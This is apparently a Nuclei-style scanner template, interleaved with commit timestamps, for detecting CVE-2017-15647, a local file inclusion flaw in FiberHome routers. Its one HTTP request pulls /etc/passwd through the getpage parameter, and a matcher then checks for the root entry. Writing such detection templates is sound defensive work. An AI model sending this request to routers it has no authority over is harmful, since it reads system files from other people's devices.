2021-07-27 11:36:29 +00:00
id : CVE-2017-15647
info :
2022-06-09 20:35:21 +00:00
name : FiberHome Routers - Local File Inclusion
2021-07-27 11:36:29 +00:00
author : daffainfo
2021-09-10 11:26:40 +00:00
severity : high
2022-06-09 20:35:21 +00:00
description : FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
2021-08-18 11:37:49 +00:00
reference :
2021-07-27 11:36:29 +00:00
- https://www.exploit-db.com/exploits/44054
2022-05-17 09:18:12 +00:00
- https://blogs.securiteam.com/index.php/archives/3472
2022-06-09 20:35:21 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-15647
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-15647
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : lfi,router,edb,cve,cve2017
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-07-27 11:36:29 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-27 11:36:29 +00:00
- method : GET
path :
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-27 11:36:29 +00:00
- type : status
status :
- 200